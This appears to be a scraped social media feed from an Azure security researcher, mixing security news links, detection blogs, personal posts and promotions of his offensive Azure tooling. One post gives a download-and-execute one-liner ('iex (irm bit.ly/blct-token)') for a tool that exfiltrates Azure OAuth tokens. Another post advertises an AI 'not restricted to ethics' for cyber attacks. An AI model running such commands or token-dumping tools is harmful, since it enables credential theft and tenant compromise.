Rogier Dijkman | MVP

Azure Tenant Takeover: From Exposed Config to Global Admin A soft-deleted file in a public blob container, still retrievable through versioning, leaks a SAS token that exposes an entire file share, ultimately cascading into a complete Azure tenant takeover th...

Azure Tenant Takeover: From Exposed Config to Global Admin azurehacking.com/post/azure-t...

🏴‍☠️ 𝗡𝗲𝘄 𝗣𝗢𝗖: 𝗙𝗲𝗱𝗲𝗿𝗮𝘁𝗲𝗱 𝗜𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗖𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻

This POC shows how you can inject a federated credential on a UAMI, mint a Graph token in less than ~5s without any infrastructure setup!

azurehacking.com/post.html?sl...

Getting Started with the BlackCat PowerShell Module azurehacking.com/post.html?sl...

Had a great time presenting “Hacking Azure” with #BlackCat at @mc2mc.be.

Thank you to @Savaco for providing such an excellent location.

I’m finalizing the slides, recording short videos, and updating the walkthrough so attendees can easily revisit the steps demonstrated.

Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere.

I wouldn’t be surprised if I need to sign a waiver if you need to fart next time.

That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it.

If you never look away, you will only see what happens in front of you.

Operating the camera 📷 at the #YellowHat event at @Microsoft

Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com

CrowdStrike University Fast Track Fuels Cybersecurity Training CrowdStrike customers now have access to no-cost fundamentals training for world-class cybersecurity education. Learn more!

www.crowdstrike.com/en-us/blog/c...

🚨AzTokenDumpr 🚨
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)

Google Gemini 2.0 Flash is now available to all Copilot users in public preview · GitHub Changelog Google Gemini 2.0 Flash is now available to all Copilot users in public preview

github.blog/changelog/20...

Self-Service Membership for GitHub Organizations In this article, we will walk through a solution to automate the process of adding new members to a GitHub organization

In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.

Clone2Leak: Your Git Credentials Belong To Us Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at GMO Flatt Security Inc. In October 2024, I was hunting bugs for the GitHub Bug Bounty program. After investigating GitHub Enterprise...

The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security
flatt.tech/research/pos...

Self-hosted password solution in Azure In this article, I’m excited to introduce a project I’ve been working on to securely share secrets using only Azure resources.

In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources.

rogierdijkman.medium.com/self-hosted-...

🚨 ANNOUNCEMENT🚨
I'm excited to announce the start of the "GitHub Lowlands" user group! 🤩

This is going to be awesome for connecting with others and stay up-date on everything about GitHub.

@github.com @arthurvandijk.bsky.social
#github #copilot #community

Detecting ‘fasthttp’ bruteforce attacks on Entra ID In this blog post, I will explain how to detect brute force attacks using Kusto Query Language (KQL) in Microsoft Defender. I will provide…

🚨 New Blog Alert! 🚨
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.

Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender

fasthttp Used in New Bruteforce Campaign SpearTip Security Operations Center, together with the SaaS Alerts team, identified an emerging threat involving the fastHTTP library

www.speartip.com/fasthttp-use...

**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.

Microsoft January 2025 Patch Tuesday Fixes 159 Flaws with 8 Zero-days Windows 11 with KB5050009, KB5050021 and Windows 10 with KB5049981, KB5050008, KB5049993, KB5050013

🚨 **Patch Alert!** 🚨 Microsoft’s January 2025 Patch Tuesday is here, and it’s packed with security updates! 🛡️

👉 Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) 🚀 #CyberSecurity #WindowsUpdate

Ready to dive into the details? 💻🔧🔍

Having fun with Microsoft Azure

Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault

Yeah, it does work at the bottom al lingerie as the comment block is within the function brackets.

I always find it clear when it is placed at the bottom of the code.

blackcat/src/Public/generic/Export-AccessTokens.ps1 at main · azurekid/blackcat Contribute to azurekid/blackcat development by creating an account on GitHub.

I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes.

github.com/azurekid/bla...

Start trading on Coinbase using this link and get 10 EUR in BTC. Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency.

coinbase.com/join/JCCM3ER...

WoW, this is awesome!
GitHub Copilot now offers a free tier

github.com/login?return...

Kali Linux 2024.4 Release (Python 3.12, Goodbye i386, Raspberry Pi Imager & Kali NetHunter) | Kali Linux Blog Just before the year starts to wrap up, we are getting the final 2024 release out! This contains a wide range of updates and changes, which are in already in effect, ready for immediate download, or u...

Kali Linux 2024.4 released with 14 new tools, deprecates some features

www.kali.org/blog/kali-li...

#Security

Unwrapping BloodHound v6.3 with Impact Analysis Just in time for the holidays, sharper tools for faster defense

posts.specterops.io/unwrapping-b...

Oasis Security Research Team Discovers Microsoft Azure MFA Bypass Critical vulnerability could have allowed malicious actors to gain unauthorized access to users’ Microsoft accounts.

Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour

www.oasis.security/resources/bl...

#Microsoft #Security #MFA

Microsoft Fixes Zero-Day, Critical RCEs in Patch Tuesday The zero-day (CVE-2024-49138), plus a worryingly critical unauthenticated RCE security vulnerability (CVE-2024-49112), are unwanted gifts for security admins this season.

Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake?

www.darkreading.com/application-...

Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access Critical CVE-2024-10905 in SailPoint's IdentityIQ (CVSS 10.0) risks unauthorized file access. Update now

thehackernews.com/2024/12/crit...

Zero Day Quest - Learn to Red Team AI Systems Using PyRIT. Recorded December 2nd 2024 YouTube video by Microsoft Security Response Center (MSRC)

In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?...

▶️PyRIT: github.com/Azure/PyRIT

www.microsoftrnd.co.il/bluehatil/co...